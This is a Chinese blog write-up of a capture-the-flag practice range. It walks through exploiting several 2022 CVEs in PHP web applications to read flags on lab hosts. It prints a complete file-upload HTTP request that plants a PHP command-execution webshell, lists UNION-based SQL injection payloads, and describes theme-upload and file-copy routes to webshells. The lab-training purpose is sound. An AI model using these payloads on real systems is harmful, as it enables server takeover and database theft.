web

春秋云镜免费靶场记录10.10

noob
2022-10-10 / 0 评论 / 494 阅读 / 正在检测是否收录...
CVE-2022-23906(CMS Made Simple v2.2.15 RCE)

参考链接:http://dev.cmsmadesimple.org/bug/view/12502
l92dnqae.png
访问/admin,以admin/123456登陆,在内容->File Manager中找到文件上传点
l92dp4gk.png
上传文件
l92dug0q.png
上传成功后,选中文件点击copy,按下图配置复制文件并命名为xxx.php
l92dwm25.png

成功后可以看到多出了刚才的php文件,直接获取flag即可
l92dy5m3.png
l92e4yrg.png
或者蚁剑链接,获取flag
l92e2jv8.png

CVE-2022-30887(Pharmacy Management System shell upload)

l92f6mnq.png

参考链接:https://packetstormsecurity.com/files/166786/Pharmacy-Management-System-1.0-Shell-Upload.html
上传poc:

POST /php_action/editProductImage.php?id=1 HTTP/1.1
Host: eci-2zeiqdtozk9gx9az693a.cloudeci1.ichunqiu.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:103.0) Gecko/20100101 Firefox/103.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type:multipart/form-data;boundary=---------------------------208935235035266125502673738631
Content-Length: 566
Connection: close
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1662902354,1664078966,1664530891,1665378480;
 chkphone=acWxNpxhQpDiAchhNuSnEqyiQuDIO0O0O; ci_session=ec8193cd25017f638aa167cee7298e97339ab2de; 
Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1665384728; PHPSESSID=qbsbo3njtcrhucddoaf7cvd8ah
Upgrade-Insecure-Requests: 1

-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="old_image"


-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="productImage"; filename="shell.php"
Content-Type: image/jpeg

<?php
if($_REQUEST['s']) {
  system($_REQUEST['s']);
  } else phpinfo();
?>
</pre>
</body>
</html>
-----------------------------208935235035266125502673738631
Content-Disposition: form-data; name="btn"


-----------------------------208935235035266125502673738631--

看到success后,访问/assets/myimages/shell.php?s=cat%20/flag读取flag
l92fn4g2.png
l92fok56.png

CVE-2022-29464(WSO2文件上传漏洞)

l92g2xr8.png
参考链接:https://github.com/hakivvi/CVE-2022-29464
l92ga08f.png
访问链接cat/flag即可
l92gcjlh.png

CVE-2022-28525(ED01-CMS v20180505 存在SQL注入漏洞)

l92gd9y2.png
搜索编号得知漏洞点在:/admin/users.php?source=edit_user&id=1
l92gyp1z.png
因此对id进行操作,直接sqlmap梭哈就能注出所有结果,但是没有flag,看到前面的介绍,属实很难绷得住,于是对上传点进行操作
l92icqp0.png
发现没任何过滤,直接传一个phpinfo发现解析,然后传一句话直连即可
l92ib6st.png
l92iactt.png

CVE-2022-28512( Fantastic Blog (CMS) SQL注入)

参考文章:https://github.com/JiuBanSec/CVE/blob/main/Fantastic%20Blog%20CMS/SQL1.md
l92cjxm8.png
直接访问single.php,加单引号看到报错
l92clio5.png
探测字段长度,为9
l92cmvme.png
l92cmmiv.png
探测回显字段,为2和4
l92co0q1.png
直接注即可
l92cq45u.png
sqlmap也可以成功
l92cuuv2.png

# 获取库名
id = "%27%20union%20select%201,database(),3,user(),5,6,7,8,9--+-"
# 获取表名
id = "%27%20union%20select%201,group_concat(table_name),3,user(),5,6,7,8,9%20from%20information_schema.tables%20where%20table_schema=%27ctf%27--+-"
# 获取列名
id = "%27%20union%20select%201,group_concat(column_name),3,user(),5,6,7,8,9%20from%20information_schema.columns%20where%20table_name=%27flag%27--+-"
# 获取数据
id = "%27%20union%20select%201,flag,3,user(),5,6,7,8,9%20from%20ctf.flag--+-"
 CVE-2022-32991(Web Based Quiz System SQL注入)

l92d3g2m.png
需要注册账号才可以,注册后登陆,在welcome.php中尝试p无果,点击start抓包,对step尝试无果,在eid中尝试发现问题
l92d4xao.png
获取数据库长度
l92dj2mc.png
后面直接布尔盲注就可,上sqlmap
l92d9s3a.png

CVE-2022-28060(Victor CMS v1.0 存在sql注入)

参考链接:https://github.com/JiuBanSec/CVE/blob/main/VictorCMS%20SQL.md
l92igbvf.png
登陆尝试万能密码
l92is1rs.png
成功登陆,说明有sql注入,对user_name进行测试
l92kdedm.png
l92keh3o.png
后续脚本可以跑出所有内容,但是找不到flag,这个没啥别的思路了,下一题
l92kfm7e.png

CVE-2022-26965(Pluck-CMS-Pluck-4.7.16 后台RCE)

l92ojzhl.png
参考链接:https://www.youtube.com/watch?v=sN6J_X4mEbY
搜索CVE,得知是通过更新主题将压缩包中的webshell写入到服务器并解析的,因此找一个主题,在任意php文件下写入一句话木马,上传后拼接/data/themes/xxx/xxx.php即可访问shell,具体操作如下
上传主题位置(主题下载链接:https://github.com/pluck-cms/themes):
l92omoqw.png
修改任意主题:
l92ons4h.png
打包后上传,然后蚁剑连接:
l92oorpi.png
l92op93y.png
或者浏览器访问获取flag
l92oqd7y.png

0

评论 (0)

取消